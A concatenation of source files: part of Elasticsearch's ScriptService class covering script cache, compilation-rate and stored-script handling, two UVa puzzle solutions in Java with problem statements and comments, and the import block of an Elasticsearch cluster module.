}
if (contexts.containsKey(settingContext)) {
this.contextsAllowed.add(settingContext);
} else {
throw new IllegalArgumentException(
"unknown script context [" + settingContext + "] found in setting [" + CONTEXTS_ALLOWED_SETTING.getKey() + "]."
);
}
}
}
this.setMaxSizeInBytes(SCRIPT_MAX_SIZE_IN_BYTES.get(settings));
this.timeProvider = timeProvider;
// Validation requires knowing which contexts exist.
this.validateCacheSettings(settings);
this.setCacheHolder(settings);
}
public static boolean isUseContextCacheSet(Settings settings) {
return SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings).equals(USE_CONTEXT_RATE_VALUE);
}
public static boolean isImplicitContextCacheSet(Settings settings) {
return new ScriptService.ContextSettings(settings).implicitContextCache();
}
public static String contextDeprecationMessage(Settings settings) {
return new ScriptService.ContextSettings(settings).deprecationMessage();
}
/**
* This is overridden in tests to disable compilation rate limiting.
*/
boolean compilationLimitsEnabled() {
return true;
}
void registerClusterSettingsListeners(ClusterSettings clusterSettings) {
clusterSettings.addSettingsUpdateConsumer(SCRIPT_MAX_SIZE_IN_BYTES, this::setMaxSizeInBytes);
// Handle all updatable per-context settings at once for each context.
for (ScriptContext<?> context : contexts.values()) {
clusterSettings.addSettingsUpdateConsumer(
(settings) -> cacheHolder.get().set(context.name, contextCache(settings, context)),
Arrays.asList(
SCRIPT_CACHE_SIZE_SETTING.getConcreteSettingForNamespace(context.name),
SCRIPT_CACHE_EXPIRE_SETTING.getConcreteSettingForNamespace(context.name),
SCRIPT_MAX_COMPILATIONS_RATE_SETTING.getConcreteSettingForNamespace(context.name),
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING,
// general settings used for fallbacks
SCRIPT_GENERAL_CACHE_SIZE_SETTING
)
);
}
// Handle all settings for context and general caches, this flips between general and context caches.
clusterSettings.addSettingsUpdateConsumer(
this::setCacheHolder,
Arrays.asList(
SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING,
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING,
SCRIPT_GENERAL_CACHE_SIZE_SETTING,
SCRIPT_MAX_COMPILATIONS_RATE_SETTING,
SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING,
SCRIPT_CACHE_EXPIRE_SETTING,
SCRIPT_CACHE_SIZE_SETTING
),
this::validateCacheSettings
);
}
/**
* Throw an IllegalArgumentException if any per-context setting does not match a context or if per-context settings are configured
* when using the general cache.
*/
void validateCacheSettings(Settings settings) {
ContextSettings contextSettings = new ContextSettings(settings, contexts.keySet());
if (contextSettings.useContextSet) {
deprecationLogger.warn(DeprecationCategory.SCRIPTING, "scripting-context-cache", USE_CONTEXT_RATE_KEY_DEPRECATION_MESSAGE);
} else if (contextSettings.hasContextSettings()) {
deprecationLogger.warn(DeprecationCategory.SCRIPTING, "scripting-context-cache", contextSettings.deprecationMessage());
}
if (contextSettings.incompatibleSettings()) {
throw new IllegalArgumentException(contextSettings.incompatibleSettingsMessage());
}
if (SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.get(settings)) {
if (contextSettings.compilationContexts.size() > 0) {
throw new IllegalArgumentException(
"Cannot set custom context compilation rates ["
+ String.join(", ", contextSettings.contextCompilationKeys())
+ "] if compile rates disabled via ["
+ SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "]"
);
}
if (contextSettings.useContextSet == false && contextSettings.isGeneralCompilationRateSet) {
throw new IllegalArgumentException(
"Cannot set custom general compilation rates ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] to ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings)
+ "] if compile rates disabled via ["
+ SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "]"
);
}
}
}
/**
* Collect settings related to script context and general caches.
*
* The general cache is used by default.
* The context cache is used if {@code script.max_compilations_rate} is {@code "use-context"}, a deprecated value.
* The context cache is used implicitly if {@code script.max_compilations_rate} is unset and any of the context
* cache family of settings is used:
* {@code script.context.*.max_compilations_rate}, {@link ScriptService#SCRIPT_MAX_COMPILATIONS_RATE_SETTING}
* {@code script.context.*.cache_max_size}, {@link ScriptService#SCRIPT_CACHE_SIZE_SETTING}
* {@code script.context.*.cache_expire}, {@link ScriptService#SCRIPT_CACHE_EXPIRE_SETTING}
*/
public static class ContextSettings {
public final Settings settings;
public final boolean useContextSet;
public final boolean isGeneralCompilationRateSet;
public final ScriptCache.CompilationRate generalCompilationRate;
public final List<String> compilationContexts;
public final List<String> sizeContexts;
public final List<String> expireContexts;
public ContextSettings(Settings settings, Set<String> contexts) {
this.settings = settings;
generalCompilationRate = SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings);
useContextSet = generalCompilationRate.equals(USE_CONTEXT_RATE_VALUE);
isGeneralCompilationRateSet = SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.exists(settings);
compilationContexts = getContexts(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, settings, contexts);
sizeContexts = getContexts(SCRIPT_CACHE_SIZE_SETTING, settings, contexts);
expireContexts = getContexts(SCRIPT_CACHE_EXPIRE_SETTING, settings, contexts);
}
public ContextSettings(Settings settings) {
this(settings, Collections.emptySet());
}
protected static List<String> getContexts(Setting.AffixSetting<?> setting, Settings settings, Set<String> contexts) {
List<String> contextSettings = new ArrayList<>();
for (String context : setting.getAsMap(settings).keySet()) {
if (contexts.isEmpty() == false && contexts.contains(context) == false) {
String settingKey = setting.getConcreteSettingForNamespace(context).getKey();
throw new IllegalArgumentException("Context [" + context + "] doesn't exist for setting [" + settingKey + "]");
}
contextSettings.add(context);
}
contextSettings.sort(Comparator.naturalOrder());
return contextSettings;
}
/** Are there any context specific settings */
public boolean hasContextSettings() {
return compilationContexts.isEmpty() == false || expireContexts.isEmpty() == false || sizeContexts.isEmpty() == false;
}
/** deprecation message for implicitly using the context cache */
public String deprecationMessage() {
// Implicitly using the script context cache is deprecated, remove the following deprecated settings to use the script general
// cache.
if (hasContextSettings() == false) {
return "";
}
List<String> settingsKeys = new ArrayList<>();
settingsKeys.addAll(fullKeys(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, compilationContexts));
settingsKeys.addAll(fullKeys(SCRIPT_CACHE_SIZE_SETTING, sizeContexts));
settingsKeys.addAll(fullKeys(SCRIPT_CACHE_EXPIRE_SETTING, expireContexts));
settingsKeys.sort(Comparator.naturalOrder());
return "Implicitly using the script context cache is deprecated, remove settings "
+ "["
+ String.join(", ", settingsKeys)
+ "] to use the script general cache.";
}
/** the context specific max compilation keys */
public List<String> contextCompilationKeys() {
return fullKeys(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, compilationContexts);
}
/** the full keys for the contexts in the context affix setting */
protected static List<String> fullKeys(Setting.AffixSetting<?> affix, List<String> contexts) {
return contexts.stream().map(ctx -> affix.getConcreteSettingForNamespace(ctx).getKey()).toList();
}
/**
* Should the context cache be used? This is true if "use-context" is set explicitly or implicitly, see above for implicit
* definition.
*/
public boolean useContextCache() {
return useContextSet || implicitContextCache();
}
/**
* Implicitly use the script context cache. False if context cache is explicitly used as well as context cache is unused.
*/
public boolean implicitContextCache() {
return useContextSet == false && hasContextSettings() && isGeneralCompilationRateSet == false;
}
/**
* Is the set of settings incompatible? This is the case if:
* 1) {@code script.max_compilations_rate}, {@link ScriptService#SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING} is set but not
* set to "use-context".
* 2) Any of the context cache family of settings is set.
*/
public boolean incompatibleSettings() {
return useContextSet == false && hasContextSettings() && isGeneralCompilationRateSet;
}
/**
* All context specific settings
*/
public List<String> contextSettings() {
List<String> contextSettings = new ArrayList<>(fullKeys(SCRIPT_MAX_COMPILATIONS_RATE_SETTING, compilationContexts));
contextSettings.addAll(fullKeys(SCRIPT_CACHE_SIZE_SETTING, sizeContexts));
contextSettings.addAll(fullKeys(SCRIPT_CACHE_EXPIRE_SETTING, expireContexts));
return contextSettings;
}
/**
* Error message if there are incompatible settings.
*/
public String incompatibleSettingsMessage() {
if (incompatibleSettings() == false) {
return "";
}
List<String> incompatible = contextSettings();
return "Context cache settings ["
+ String.join(",", incompatible)
+ "] are incompatible with ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] set to non-default value ["
+ generalCompilationRate
+ "]."
+ " Either remove the incompatible settings (recommended) or set ["
+ SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey()
+ "] to ["
+ USE_CONTEXT_RATE_KEY
+ "] to use per-context settings";
}
}
@Override
public void close() throws IOException {
IOUtils.close(engines.values());
}
/**
* @return an unmodifiable {@link Map} of available script context names to {@link ScriptContext}s
*/
public Map<String, ScriptContext<?>> getScriptContexts() {
return contexts;
}
private ScriptEngine getEngine(String lang) {
ScriptEngine scriptEngine = engines.get(lang);
if (scriptEngine == null) {
throw new IllegalArgumentException("script_lang not supported [" + lang + "]");
}
return scriptEngine;
}
/**
* Changes the maximum number of bytes a script's source is allowed to have.
* @param newMaxSizeInBytes The new maximum number of bytes.
*/
void setMaxSizeInBytes(int newMaxSizeInBytes) {
for (Map.Entry<String, StoredScriptSource> source : getScriptsFromClusterState().entrySet()) {
if (source.getValue().getSource().getBytes(StandardCharsets.UTF_8).length > newMaxSizeInBytes) {
throw new IllegalArgumentException(
"script.max_size_in_bytes cannot be set to ["
+ newMaxSizeInBytes
+ "], "
+ "stored script ["
+ source.getKey()
+ "] exceeds the new value with a size of "
+ "["
+ source.getValue().getSource().getBytes(StandardCharsets.UTF_8).length
+ "]"
);
}
}
maxSizeInBytes = newMaxSizeInBytes;
}
/**
* Compiles a script using the given context.
*
* @return a compiled script which may be used to construct instances of a script for the given context
*/
public <FactoryType> FactoryType compile(Script script, ScriptContext<FactoryType> context) {
Objects.requireNonNull(script);
Objects.requireNonNull(context);
ScriptType type = script.getType();
String lang = script.getLang();
String idOrCode = script.getIdOrCode();
Map<String, String> options = script.getOptions();
String id = idOrCode;
if (type == ScriptType.STORED) {
// * lang and options will both be null when looking up a stored script,
// so we must get the source to retrieve them before checking if the
// context is supported
// * a stored script must be pulled from the cluster state every time in case
// the script has been updated since the last compilation
StoredScriptSource source = getScriptFromClusterState(id);
lang = source.getLang();
idOrCode = source.getSource();
options = source.getOptions();
}
ScriptEngine scriptEngine = getEngine(lang);
if (isTypeEnabled(type) == false) {
throw new IllegalArgumentException("cannot execute [" + type + "] scripts");
}
if (contexts.containsKey(context.name) == false) {
throw new IllegalArgumentException("script context [" + context.name + "] not supported");
}
if (isContextEnabled(context) == false) {
throw new IllegalArgumentException("cannot execute scripts using [" + context.name + "] context");
}
if (type == ScriptType.INLINE) {
if (idOrCode.getBytes(StandardCharsets.UTF_8).length > maxSizeInBytes) {
throw new IllegalArgumentException(
"exceeded max allowed inline script size in bytes ["
+ maxSizeInBytes
+ "] "
+ "with size ["
+ idOrCode.getBytes(StandardCharsets.UTF_8).length
+ "] for script ["
+ idOrCode
+ "]"
);
}
}
if (logger.isTraceEnabled()) {
logger.trace("compiling lang: [{}] type: [{}] script: {}", lang, type, idOrCode);
}
ScriptCache scriptCache = cacheHolder.get().get(context.name);
assert scriptCache != null : "script context [" + context.name + "] has no script cache";
return scriptCache.compile(context, scriptEngine, id, idOrCode, type, options);
}
public boolean isLangSupported(String lang) {
Objects.requireNonNull(lang);
return engines.containsKey(lang);
}
public boolean isTypeEnabled(ScriptType scriptType) {
return typesAllowed == null || typesAllowed.contains(scriptType.getName());
}
public boolean isContextEnabled(ScriptContext<?> scriptContext) {
return contextsAllowed == null || contextsAllowed.contains(scriptContext.name);
}
public boolean isAnyContextEnabled() {
return contextsAllowed == null || contextsAllowed.isEmpty() == false;
}
Map<String, StoredScriptSource> getScriptsFromClusterState() {
if (clusterState == null) {
return Collections.emptyMap();
}
ScriptMetadata scriptMetadata = clusterState.metadata().custom(ScriptMetadata.TYPE);
if (scriptMetadata == null) {
return Collections.emptyMap();
}
return scriptMetadata.getStoredScripts();
}
protected StoredScriptSource getScriptFromClusterState(String id) {
ScriptMetadata scriptMetadata = clusterState.metadata().custom(ScriptMetadata.TYPE);
if (scriptMetadata == null) {
throw new ResourceNotFoundException("unable to find script [" + id + "] in cluster state");
}
StoredScriptSource source = scriptMetadata.getStoredScript(id);
if (source == null) {
throw new ResourceNotFoundException("unable to find script [" + id + "] in cluster state");
}
return source;
}
public void putStoredScript(
ClusterService clusterService,
PutStoredScriptRequest request,
ActionListener<AcknowledgedResponse> listener
) {
if (request.content().length() > maxSizeInBytes) {
throw new IllegalArgumentException(
"exceeded max allowed stored script size in bytes ["
+ maxSizeInBytes
+ "] with size ["
+ request.content().length()
+ "] for script ["
+ request.id()
+ "]"
);
}
StoredScriptSource source = request.source();
if (isLangSupported(source.getLang()) == false) {
throw new IllegalArgumentException("unable to put stored script with unsupported lang [" + source.getLang() + "]");
}
try {
ScriptEngine scriptEngine = getEngine(source.getLang());
if (isTypeEnabled(ScriptType.STORED) == false) {
throw new IllegalArgumentException(
"cannot put [" + ScriptType.STORED + "] script, [" + ScriptType.STORED + "] scripts are not enabled"
);
} else if (isAnyContextEnabled() == false) {
throw new IllegalArgumentException("cannot put [" + ScriptType.STORED + "] script, no script contexts are enabled");
} else if (request.context() != null) {
ScriptContext<?> context = contexts.get(request.context());
if (context == null) {
throw new IllegalArgumentException("Unknown context [" + request.context() + "]");
}
if (context.allowStoredScript == false) {
throw new IllegalArgumentException("cannot store a script for context [" + request.context() + "]");
}
scriptEngine.compile(request.id(), source.getSource(), context, Collections.emptyMap());
}
} catch (ScriptException good) {
throw good;
} catch (Exception exception) {
throw new IllegalArgumentException("failed to parse/compile stored script [" + request.id() + "]", exception);
}
submitUnbatchedTask(clusterService, "put-script-" + request.id(), new AckedClusterStateUpdateTask(request, listener) {
@Override
public ClusterState execute(ClusterState currentState) {
ScriptMetadata smd = currentState.metadata().custom(ScriptMetadata.TYPE);
smd = ScriptMetadata.putStoredScript(smd, request.id(), source);
Metadata.Builder mdb = Metadata.builder(currentState.getMetadata()).putCustom(ScriptMetadata.TYPE, smd);
return ClusterState.builder(currentState).metadata(mdb).build();
}
});
}
public static void deleteStoredScript(
ClusterService clusterService,
DeleteStoredScriptRequest request,
ActionListener<AcknowledgedResponse> listener
) {
submitUnbatchedTask(clusterService, "delete-script-" + request.id(), new AckedClusterStateUpdateTask(request, listener) {
@Override
public ClusterState execute(ClusterState currentState) {
ScriptMetadata smd = currentState.metadata().custom(ScriptMetadata.TYPE);
smd = ScriptMetadata.deleteStoredScript(smd, request.id());
Metadata.Builder mdb = Metadata.builder(currentState.getMetadata()).putCustom(ScriptMetadata.TYPE, smd);
return ClusterState.builder(currentState).metadata(mdb).build();
}
});
}
@SuppressForbidden(reason = "legacy usage of unbatched task") // TODO add support for batching here
private static void submitUnbatchedTask(
ClusterService clusterService,
@SuppressWarnings("SameParameterValue") String source,
ClusterStateUpdateTask task
) {
clusterService.submitUnbatchedStateUpdateTask(source, task);
}
public static StoredScriptSource getStoredScript(ClusterState state, GetStoredScriptRequest request) {
ScriptMetadata scriptMetadata = state.metadata().custom(ScriptMetadata.TYPE);
if (scriptMetadata != null) {
return scriptMetadata.getStoredScript(request.id());
} else {
return null;
}
}
public Set<ScriptContextInfo> getContextInfos() {
Set<ScriptContextInfo> infos = Sets.newHashSetWithExpectedSize(contexts.size());
for (ScriptContext<?> context : contexts.values()) {
infos.add(new ScriptContextInfo(context.name, context.instanceClazz));
}
return infos;
}
public ScriptLanguagesInfo getScriptLanguages() {
Set<String> types = typesAllowed;
if (types == null) {
types = new HashSet<>();
for (ScriptType type : ScriptType.values()) {
types.add(type.getName());
}
}
final Set<String> contexts = contextsAllowed != null ? contextsAllowed : this.contexts.keySet();
Map<String, Set<String>> languageContexts = new HashMap<>();
engines.forEach(
(key, value) -> languageContexts.put(
key,
value.getSupportedContexts().stream().map(c -> c.name).filter(contexts::contains).collect(Collectors.toSet())
)
);
return new ScriptLanguagesInfo(types, languageContexts);
}
public ScriptStats stats() {
return cacheHolder.get().stats();
}
public ScriptCacheStats cacheStats() {
return cacheHolder.get().cacheStats();
}
@Override
public void applyClusterState(ClusterChangedEvent event) {
clusterState = event.state();
}
void setCacheHolder(Settings settings) {
CacheHolder current = cacheHolder.get();
ContextSettings contextSettings = new ContextSettings(settings, contexts.keySet());
if (current == null) {
if (contextSettings.useContextCache()) {
cacheHolder.set(contextCacheHolder(settings));
} else {
cacheHolder.set(generalCacheHolder(settings));
}
return;
}
// Update
if (contextSettings.useContextCache()) {
if (current.general != null) {
// Flipping to context specific
cacheHolder.set(contextCacheHolder(settings));
}
} else if (current.general == null) {
// Flipping to general
cacheHolder.set(generalCacheHolder(settings));
} else if (current.general.rate.equals(SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings)) == false
|| current.general.cacheExpire.equals(SCRIPT_GENERAL_CACHE_EXPIRE_SETTING.get(settings)) == false
|| current.general.cacheSize != SCRIPT_GENERAL_CACHE_SIZE_SETTING.get(settings)) {
// General compilation rate, cache expiration or cache size changed
cacheHolder.set(generalCacheHolder(settings));
}
}
CacheHolder generalCacheHolder(Settings settings) {
ScriptCache.CompilationRate rate = SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.get(settings);
if (SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.get(settings) || compilationLimitsEnabled() == false) {
rate = SCRIPT_COMPILATION_RATE_ZERO;
}
return new CacheHolder(
SCRIPT_GENERAL_CACHE_SIZE_SETTING.get(settings),
SCRIPT_GENERAL_CACHE_EXPIRE_SETTING.get(settings),
rate,
SCRIPT_GENERAL_MAX_COMPILATIONS_RATE_SETTING.getKey(),
timeProvider
);
}
CacheHolder contextCacheHolder(Settings settings) {
Map<String, ScriptCache> contextCache = Maps.newMapWithExpectedSize(contexts.size());
contexts.forEach((k, v) -> contextCache.put(k, contextCache(settings, v)));
return new CacheHolder(contextCache);
}
ScriptCache contextCache(Settings settings, ScriptContext<?> context) {
Setting<Integer> cacheSizeSetting = SCRIPT_CACHE_SIZE_SETTING.getConcreteSettingForNamespace(context.name);
int cacheSize = cacheSizeSetting.existsOrFallbackExists(settings) ? cacheSizeSetting.get(settings) : context.cacheSizeDefault;
Setting<TimeValue> cacheExpireSetting = SCRIPT_CACHE_EXPIRE_SETTING.getConcreteSettingForNamespace(context.name);
TimeValue cacheExpire = cacheExpireSetting.existsOrFallbackExists(settings)
? cacheExpireSetting.get(settings)
: context.cacheExpireDefault;
Setting<ScriptCache.CompilationRate> rateSetting = SCRIPT_MAX_COMPILATIONS_RATE_SETTING.getConcreteSettingForNamespace(
context.name
);
ScriptCache.CompilationRate rate;
if (SCRIPT_DISABLE_MAX_COMPILATIONS_RATE_SETTING.get(settings)
|| compilationLimitsEnabled() == false
|| context.compilationRateLimited == false) {
rate = SCRIPT_COMPILATION_RATE_ZERO;
} else if (rateSetting.existsOrFallbackExists(settings)) {
rate = rateSetting.get(settings);
} else {
rate = new ScriptCache.CompilationRate(ScriptContext.DEFAULT_COMPILATION_RATE_LIMIT);
}
return new ScriptCache(cacheSize, cacheExpire, rate, rateSetting.getKey(), timeProvider);
}
/**
* Container for the ScriptCache(s). This class operates in two modes:
* 1) general mode, if the general script cache is configured. There are no context caches in this case.
* 2) context mode, if the context script cache is configured. There is no general cache in this case.
*/
static class CacheHolder {
final ScriptCache general;
final Map<String, AtomicReference<ScriptCache>> contextCache;
CacheHolder(
int cacheMaxSize,
TimeValue cacheExpire,
ScriptCache.CompilationRate maxCompilationRate,
String contextRateSetting,
LongSupplier timeProvider
) {
contextCache = null;
general = new ScriptCache(cacheMaxSize, cacheExpire, maxCompilationRate, contextRateSetting, timeProvider);
}
CacheHolder(Map<String, ScriptCache> context) {
Map<String, AtomicReference<ScriptCache>> refs = Maps.newMapWithExpectedSize(context.size());
context.forEach((k, v) -> refs.put(k, new AtomicReference<>(v)));
contextCache = Collections.unmodifiableMap(refs);
general = null;
}
/**
* get the cache appropriate for the context. If in general mode, return the general cache. Otherwise return the ScriptCache for
* the given context. Returns null in context mode if the requested context does not exist.
*/
ScriptCache get(String context) {
if (general != null) {
return general;
}
AtomicReference<ScriptCache> ref = contextCache.get(context);
if (ref == null) {
return null;
}
return ref.get();
}
ScriptStats stats() {
if (general != null) {
return general.stats();
}
List<ScriptContextStats> contextStats = new ArrayList<>(contextCache.size());
for (Map.Entry<String, AtomicReference<ScriptCache>> entry : contextCache.entrySet()) {
ScriptCache cache = entry.getValue().get();
contextStats.add(cache.stats(entry.getKey()));
}
return ScriptStats.read(contextStats);
}
ScriptCacheStats cacheStats() {
if (general != null) {
return new ScriptCacheStats(general.stats());
}
Map<String, ScriptStats> context = Maps.newMapWithExpectedSize(contextCache.size());
for (String name : contextCache.keySet()) {
context.put(name, contextCache.get(name).get().stats());
}
return new ScriptCacheStats(context);
}
/**
* Update a single context cache if we're in the context cache mode otherwise no-op.
*/
void set(String name, ScriptCache cache) {
if (general != null) {
return;
}
AtomicReference<ScriptCache> ref = contextCache.get(name);
assert ref != null : "expected script cache to exist for context [" + name + "]";
ScriptCache oldCache = ref.get();
assert oldCache != null : "expected script cache to be non-null for context [" + name + "]";
ref.set(cache);
logger.debug("Replaced context [" + name + "] with new settings");
}
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/script/ScriptService.java |
1,156 | /**
 * Let us look at a boring mathematics problem. :-) We have three different
 * integers, x, y and z, which satisfy the following three relations:
 * x + y + z = A
 * xyz = B
 * x^2 + y^2 + z^2 = C
 * You are asked to write a program that solves for x, y and z for given values of A, B and C.
 * Input
 * The first line of the input file gives the number of test cases N (N < 20). Each of the
 * following N lines gives the values of A, B and C (1 ≤ A, B, C ≤ 10000).
 * Output
 * For each test case, output the corresponding values of x, y and z. If there are many possible
 * answers, choose the one with the least value of x. If there is a tie, output the one with the
 * least value of y. If there is no solution, output the line ‘No solution.’ instead.
 * Sample Input
 * 2
 * 1 2 3
 * 6 6 14
 * Sample Output
 * No solution.
 * 1 2 3
*/
// https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=2612
import java.util.Scanner;
public class SolveEquation {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int numberOfTestCases = input.nextInt();
while (numberOfTestCases != 0) {
int A = input.nextInt();
int B = input.nextInt();
int C = input.nextInt();
boolean hasSolution = false;
for (int x = -22; x <= 22 && !hasSolution; x++) {
if (x * x <= C) {
for (int y = -100; y <= 100 && !hasSolution; y++) {
if (x != y && y * y <= C && (x * x + y * y <= C)) {
int z = A - x - y;
if ((z != y && z != x && x * x + y * y + z * z == C)
&& x * y * z == B) {
hasSolution = true;
System.out.println(x + " " + y + " " + z);
}
}
}
}
}
if (!hasSolution) {
System.out.println("No solution.");
}
numberOfTestCases--;
}
}
}
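// Bound note (an observation, not part of the original submission): since x*x + y*y + z*z = C and
// C <= 10000, every unknown lies in [-100, 100]; a conservative brute force would scan x (and y)
// over that whole range, still iterating x ascending and then y ascending so that the first hit is
// the required "least x, then least y" answer.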
| kdn251/interviews | uva/SolveEquation.java |
1,159 | // An army of ants walk on a horizontal pole of length l cm, each with a constant speed of 1 cm/s. When
// a walking ant reaches an end of the pole, it immediately falls off it. When two ants meet they turn
// back and start walking in opposite directions. We know the original positions of ants on the pole,
// unfortunately, we do not know the directions in which the ants are walking. Your task is to compute
// the earliest and the latest possible times needed for all ants to fall off the pole.
// Input
// The first line of input contains one integer giving the number of cases that follow. The data for each
// case start with two integer numbers: the length of the pole (in cm) and n, the number of ants residing
// on the pole. These two numbers are followed by n integers giving the position of each ant on the pole
// as the distance measured from the left end of the pole, in no particular order. All input integers are
// not bigger than 1000000 and they are separated by whitespace.
// Output
// For each case of input, output two numbers separated by a single space. The first number is the earliest
// possible time when all ants fall off the pole (if the directions of their walks are chosen appropriately)
// and the second number is the latest possible such time.
// Sample Input
// 2
// 10 3
// 2 6 7
// 214 7
// 11 12 7 13 176 23 191
// Sample Output
// 4 8
// 38 207
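// Key observation: when two ants meet and turn around, the resulting set of positions and headings
// is the same as if they had simply walked through each other, so the fall-off times do not depend
// on the chosen directions. An ant at position p therefore falls off after at least min(p, L - p)
// seconds and after at most max(p, L - p) seconds, and the answers are the maxima of those values
// over all ants. For the first sample (L = 10, ants at 2, 6, 7): min = max(2, 4, 3) = 4 and
// max = max(8, 6, 7) = 8, matching the expected output.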
import java.util.Scanner;
/**
* Created by kdn251 on 2/22/17.
*/
public class Ants {
public static void main(String args[]) throws Exception {
//initialize buffered reader
Scanner sc = new Scanner(System.in);
//initialize test cases
int testCases = sc.nextInt();
//declare current ant
int currentAnt;
while(testCases > 0) {
//initialize length of rod and number of ants
int length = sc.nextInt();
int numberOfAnts = sc.nextInt();
//initialize min and max to zero
int min = 0;
int max = 0;
//iterate while there are still remaining ants to process
while(numberOfAnts > 0) {
//read in current ant
currentAnt = sc.nextInt();
//calculate whether ant is closer to left side of rod or right side of rod
currentAnt = currentAnt < length - currentAnt ? currentAnt : length - currentAnt;
//update minimum time to most restrictive ant minimum time
if(currentAnt > min) {
min = currentAnt;
}
//update maximum time to most restrictive ant maximum time
if(length - currentAnt > max) {
max = length - currentAnt;
}
//decrement number of ants remaining
numberOfAnts--;
}
//print min and max of current test case
System.out.println(min + " " + max);
//decrement number of test cases remaining
testCases--;
}
}
}
//source: https://github.com/morris821028/UVa/blob/master/volume107/10714%20-%20Ants.cpp | kdn251/interviews | uva/Ants.java |
1,160 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.cluster;
import org.elasticsearch.action.admin.indices.rollover.MetadataRolloverService;
import org.elasticsearch.cluster.action.index.MappingUpdatedAction;
import org.elasticsearch.cluster.action.shard.ShardStateAction;
import org.elasticsearch.cluster.metadata.ComponentTemplateMetadata;
import org.elasticsearch.cluster.metadata.ComposableIndexTemplateMetadata;
import org.elasticsearch.cluster.metadata.DataStreamMetadata;
import org.elasticsearch.cluster.metadata.DesiredNodesMetadata;
import org.elasticsearch.cluster.metadata.IndexGraveyard;
import org.elasticsearch.cluster.metadata.IndexNameExpressionResolver;
import org.elasticsearch.cluster.metadata.Metadata;
import org.elasticsearch.cluster.metadata.MetadataDeleteIndexService;
import org.elasticsearch.cluster.metadata.MetadataIndexAliasesService;
import org.elasticsearch.cluster.metadata.MetadataIndexStateService;
import org.elasticsearch.cluster.metadata.MetadataIndexTemplateService;
import org.elasticsearch.cluster.metadata.MetadataMappingService;
import org.elasticsearch.cluster.metadata.NodesShutdownMetadata;
import org.elasticsearch.cluster.metadata.RepositoriesMetadata;
import org.elasticsearch.cluster.routing.DelayedAllocationService;
import org.elasticsearch.cluster.routing.ShardRouting;
import org.elasticsearch.cluster.routing.ShardRoutingRoleStrategy;
import org.elasticsearch.cluster.routing.allocation.AllocationService;
import org.elasticsearch.cluster.routing.allocation.AllocationService.RerouteStrategy;
import org.elasticsearch.cluster.routing.allocation.AllocationStatsService;
import org.elasticsearch.cluster.routing.allocation.ExistingShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.WriteLoadForecaster;
import org.elasticsearch.cluster.routing.allocation.allocator.BalancedShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.allocator.DesiredBalanceShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.allocator.DesiredBalanceShardsAllocator.DesiredBalanceReconcilerAction;
import org.elasticsearch.cluster.routing.allocation.allocator.ShardsAllocator;
import org.elasticsearch.cluster.routing.allocation.decider.AllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.AllocationDeciders;
import org.elasticsearch.cluster.routing.allocation.decider.AwarenessAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ClusterRebalanceAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ConcurrentRebalanceAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.DiskThresholdDecider;
import org.elasticsearch.cluster.routing.allocation.decider.EnableAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.FilterAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.MaxRetryAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.NodeReplacementAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.NodeShutdownAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.NodeVersionAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.RebalanceOnlyWhenActiveAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ReplicaAfterPrimaryActiveAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ResizeAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.RestoreInProgressAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.SameShardAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ShardsLimitAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.SnapshotInProgressAllocationDecider;
import org.elasticsearch.cluster.routing.allocation.decider.ThrottlingAllocationDecider;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.common.inject.AbstractModule;
import org.elasticsearch.common.io.stream.NamedWriteable;
import org.elasticsearch.common.io.stream.NamedWriteableRegistry.Entry;
import org.elasticsearch.common.io.stream.Writeable.Reader;
import org.elasticsearch.common.settings.ClusterSettings;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.common.settings.Setting.Property;
import org.elasticsearch.common.settings.Settings;
